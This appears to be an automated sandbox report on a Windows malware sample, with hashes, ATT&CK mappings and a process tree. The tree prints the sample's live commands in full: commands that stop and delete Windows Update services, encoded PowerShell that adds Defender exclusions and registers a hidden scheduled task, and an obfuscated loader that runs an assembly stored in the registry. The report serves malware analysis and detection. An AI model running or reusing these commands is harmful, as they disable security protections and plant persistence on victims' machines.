65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52

General

Target

EdEYMrpFBNbTRHo.exe
Size

4.5MB
MD5

b7c12ce33a5c2de80bcd7083d839df6e
SHA1

6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1
SHA256

65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52
SHA512

b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225
SSDEEP

98304:Ha3DFNglg7shj9/X92ZmvG+Hc7supSg8MXGBl3Qbf2jYpvRhzPQA:q23V9/X9pvL+sWKMXGwDEYVx

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

3036 takeown.exe
2244 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
3036	takeown.exe
2244	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EdEYMrpFBNbTRHo.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	EdEYMrpFBNbTRHo.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

3036 takeown.exe
2244 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

EdEYMrpFBNbTRHo.exe

description pid process target process

PID 2604 set thread context of 3216 2604 EdEYMrpFBNbTRHo.exe conhost.exe
Drops file in Windows directory 1 IoCs

Processes:

conhost.exe

description ioc process

File created C:\Windows\Tasks\dialersvc32.job conhost.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

4632 sc.exe
5068 sc.exe
316 sc.exe
640 sc.exe
4664 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

4088 reg.exe
4312 reg.exe
2212 reg.exe
952 reg.exe
100 reg.exe
4892 reg.exe
452 reg.exe
3516 reg.exe
4240 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeEdEYMrpFBNbTRHo.exepowershell.exe

pid process

4832 powershell.exe
4832 powershell.exe
2604 EdEYMrpFBNbTRHo.exe
3136 powershell.exe

pid	process
3036	takeown.exe
2244	icacls.exe

flow	ioc
17	ip-api.com

description	pid	process	target process
PID 2604 set thread context of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe

pid	process
4632	sc.exe
5068	sc.exe
316	sc.exe
640	sc.exe
4664	sc.exe

pid	process
4088	reg.exe
4312	reg.exe
2212	reg.exe
952	reg.exe
100	reg.exe
4892	reg.exe
452	reg.exe
3516	reg.exe
4240	reg.exe

pid	process
4832	powershell.exe
4832	powershell.exe
2604	EdEYMrpFBNbTRHo.exe
3136	powershell.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exeEdEYMrpFBNbTRHo.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeDebugPrivilege	2604	EdEYMrpFBNbTRHo.exe
Token: SeShutdownPrivilege	944	powercfg.exe
Token: SeCreatePagefilePrivilege	944	powercfg.exe
Token: SeShutdownPrivilege	1184	powercfg.exe
Token: SeCreatePagefilePrivilege	1184	powercfg.exe
Token: SeShutdownPrivilege	4600	powercfg.exe
Token: SeCreatePagefilePrivilege	4600	powercfg.exe
Token: SeShutdownPrivilege	820	powercfg.exe
Token: SeCreatePagefilePrivilege	820	powercfg.exe
Token: SeTakeOwnershipPrivilege	3036	takeown.exe
Token: SeDebugPrivilege	3136	powershell.exe

Suspicious use of WriteProcessMemory 51 IoCs

Processes:

EdEYMrpFBNbTRHo.execmd.execmd.exe

description	pid	process	target process
PID 2604 wrote to memory of 4832	2604	EdEYMrpFBNbTRHo.exe	powershell.exe
PID 2604 wrote to memory of 4832	2604	EdEYMrpFBNbTRHo.exe	powershell.exe
PID 2604 wrote to memory of 532	2604	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 2604 wrote to memory of 532	2604	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 2604 wrote to memory of 4672	2604	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 2604 wrote to memory of 4672	2604	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 532 wrote to memory of 640	532	cmd.exe	sc.exe
PID 532 wrote to memory of 640	532	cmd.exe	sc.exe
PID 4672 wrote to memory of 944	4672	cmd.exe	powercfg.exe
PID 4672 wrote to memory of 944	4672	cmd.exe	powercfg.exe
PID 532 wrote to memory of 4664	532	cmd.exe	sc.exe
PID 532 wrote to memory of 4664	532	cmd.exe	sc.exe
PID 4672 wrote to memory of 1184	4672	cmd.exe	powercfg.exe
PID 4672 wrote to memory of 1184	4672	cmd.exe	powercfg.exe
PID 532 wrote to memory of 4632	532	cmd.exe	sc.exe
PID 532 wrote to memory of 4632	532	cmd.exe	sc.exe
PID 4672 wrote to memory of 4600	4672	cmd.exe	powercfg.exe
PID 4672 wrote to memory of 4600	4672	cmd.exe	powercfg.exe
PID 532 wrote to memory of 5068	532	cmd.exe	sc.exe
PID 532 wrote to memory of 5068	532	cmd.exe	sc.exe
PID 4672 wrote to memory of 820	4672	cmd.exe	powercfg.exe
PID 4672 wrote to memory of 820	4672	cmd.exe	powercfg.exe
PID 532 wrote to memory of 316	532	cmd.exe	sc.exe
PID 532 wrote to memory of 316	532	cmd.exe	sc.exe
PID 532 wrote to memory of 100	532	cmd.exe	reg.exe
PID 532 wrote to memory of 100	532	cmd.exe	reg.exe
PID 532 wrote to memory of 4892	532	cmd.exe	reg.exe
PID 532 wrote to memory of 4892	532	cmd.exe	reg.exe
PID 532 wrote to memory of 4088	532	cmd.exe	reg.exe
PID 532 wrote to memory of 4088	532	cmd.exe	reg.exe
PID 532 wrote to memory of 452	532	cmd.exe	reg.exe
PID 532 wrote to memory of 452	532	cmd.exe	reg.exe
PID 532 wrote to memory of 4312	532	cmd.exe	reg.exe
PID 532 wrote to memory of 4312	532	cmd.exe	reg.exe
PID 532 wrote to memory of 3036	532	cmd.exe	takeown.exe
PID 532 wrote to memory of 3036	532	cmd.exe	takeown.exe
PID 532 wrote to memory of 2244	532	cmd.exe	icacls.exe
PID 532 wrote to memory of 2244	532	cmd.exe	icacls.exe
PID 2604 wrote to memory of 3136	2604	EdEYMrpFBNbTRHo.exe	powershell.exe
PID 2604 wrote to memory of 3136	2604	EdEYMrpFBNbTRHo.exe	powershell.exe
PID 2604 wrote to memory of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe
PID 2604 wrote to memory of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe
PID 2604 wrote to memory of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe
PID 2604 wrote to memory of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe
PID 2604 wrote to memory of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe
PID 2604 wrote to memory of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe
PID 2604 wrote to memory of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe
PID 2604 wrote to memory of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe
PID 2604 wrote to memory of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe
PID 2604 wrote to memory of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe
PID 2604 wrote to memory of 3216	2604	EdEYMrpFBNbTRHo.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\EdEYMrpFBNbTRHo.exe
"C:\Users\Admin\AppData\Local\Temp\EdEYMrpFBNbTRHo.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgByAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBpAHcAdwAjAD4A"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:532

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:640

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4664

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4632

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:5068

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:316

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:100

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:4892

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:4088

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:452

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:4312

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3036

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2244

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2212

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3516

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4240

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:952

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:2420

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:4512

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:2712

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:3264

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:1096

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:1664

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:4672

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4600

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AcAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AHQAZQBtAHAAIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AGUAbQBwAC4AZQB4AGUAJwApACAAPAAjAHcAaAByAGoAIwA+AA=="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3136

C:\Users\Admin\AppData\Local\Temp\temp.exe
"C:\Users\Admin\AppData\Local\Temp\temp.exe"
3⤵
PID:4456

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
- Drops file in Windows directory
PID:3216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbQB5AHcAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEARwBVAEEAYwB3AEIAcwBBAEMATQBBAFAAZwBBAGcAQQBGAE0AQQBkAEEAQgBoAEEASABJAEEAZABBAEEAdABBAEYAQQBBAGMAZwBCAHYAQQBHAE0AQQBaAFEAQgB6AEEASABNAEEASQBBAEEAdABBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMAYwBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBBAGcAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAYwB3AEIAYwBBAEUAYwBBAGIAdwBCAHYAQQBHAGMAQQBiAEEAQgBsAEEARgB3AEEAUQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBYAEEAQgAxAEEASABBAEEAWgBBAEIAaABBAEgAUQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGwAQQBIAEkAQQBZAGcAQQBnAEEARgBJAEEAZABRAEIAdQBBAEUARQBBAGMAdwBBAGcAQQBEAHcAQQBJAHcAQgB4AEEARwBVAEEASQB3AEEAKwBBAEEAPQA9ACIAJwApACAAPAAjAGYAcgAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGMAawBrACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAeAB4ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdgB2AGUAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABFAGQARQBZAE0AcgBwAEYAQgBOAGIAVABSAEgAbwAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGkAeQBiAHoAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAGgAYwBiAHgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
2⤵
PID:4048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:1840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:2344

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{9ff0bf94-814f-457f-bcb6-1d5a148ead6f}
1⤵
PID:2564

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
359d1e37a264703c99ebd01eed362de5

SHA1
a1122c8bf9848b3371cd191ba540864204d1d845

SHA256
5781f3046b0d978469415a059cf5ceae0e532869e69ab1dffb8ed878bd299b07

SHA512
ce3caa1d2205be8167b7cd48ebf538a9ce8c148643c26a20377894aa15cf00f90b2b5e2ebf35d40a0273c088abc11fe6f010e34691d7fbc4bef8d7e482f5087d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
c6faeb4000ac06f0b65ffc2d2f6548df

SHA1
b89d2aeca98ec429e94dfe6d5d72c65ab8953869

SHA256
77e0a51a2d796e8230ea42972ee18aeeec6d20a939fdcfe243c354975e93dc13

SHA512
b82b3b239659642d1f235ceef7a2dc22a86521eb84bf6b483e06320fb54f2c18785264c77190bfa51b600c8370efd4e5993f318d97f63f3318bdf64d19b78064

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.exe
Filesize
7KB

MD5
f321da5881a6aaeb53da13d5c075406b

SHA1
979ed66205d2bad63fc016dc8c32cff6a2b6fc05

SHA256
a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c

SHA512
c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.exe
Filesize
7KB

MD5
f321da5881a6aaeb53da13d5c075406b

SHA1
979ed66205d2bad63fc016dc8c32cff6a2b6fc05

SHA256
a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c

SHA512
c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b

Download Submit
memory/100-149-0x0000000000000000-mapping.dmp

Download
memory/316-148-0x0000000000000000-mapping.dmp

Download
memory/452-152-0x0000000000000000-mapping.dmp

Download
memory/532-137-0x0000000000000000-mapping.dmp

Download
memory/640-140-0x0000000000000000-mapping.dmp

Download
memory/820-147-0x0000000000000000-mapping.dmp

Download
memory/916-191-0x0000000000000000-mapping.dmp

Download
memory/944-141-0x0000000000000000-mapping.dmp

Download
memory/952-176-0x0000000000000000-mapping.dmp

Download
memory/1096-187-0x0000000000000000-mapping.dmp

Download
memory/1184-143-0x0000000000000000-mapping.dmp

Download
memory/1664-188-0x0000000000000000-mapping.dmp

Download
memory/1840-202-0x00007FF831C60000-0x00007FF831D1E000-memory.dmp

Filesize
760KB

Download
memory/1840-181-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmp

Filesize
10.8MB

Download
memory/1840-189-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

Filesize
2.0MB

Download
memory/1840-190-0x00007FF831C60000-0x00007FF831D1E000-memory.dmp

Filesize
760KB

Download
memory/1840-201-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

Filesize
2.0MB

Download
memory/1840-204-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmp

Filesize
10.8MB

Download
memory/2212-167-0x0000000000000000-mapping.dmp

Download
memory/2244-155-0x0000000000000000-mapping.dmp

Download
memory/2344-195-0x0000000004500000-0x0000000004522000-memory.dmp

Filesize
136KB

Download
memory/2344-183-0x00000000047C0000-0x0000000004DE8000-memory.dmp

Filesize
6.2MB

Download
memory/2344-198-0x0000000004F60000-0x0000000004FC6000-memory.dmp

Filesize
408KB

Download
memory/2344-179-0x0000000004020000-0x0000000004056000-memory.dmp

Filesize
216KB

Download
memory/2344-197-0x00000000046C0000-0x0000000004726000-memory.dmp

Filesize
408KB

Download
memory/2420-177-0x0000000000000000-mapping.dmp

Download
memory/2564-192-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2564-193-0x00000001400033F4-mapping.dmp

Download
memory/2564-196-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB
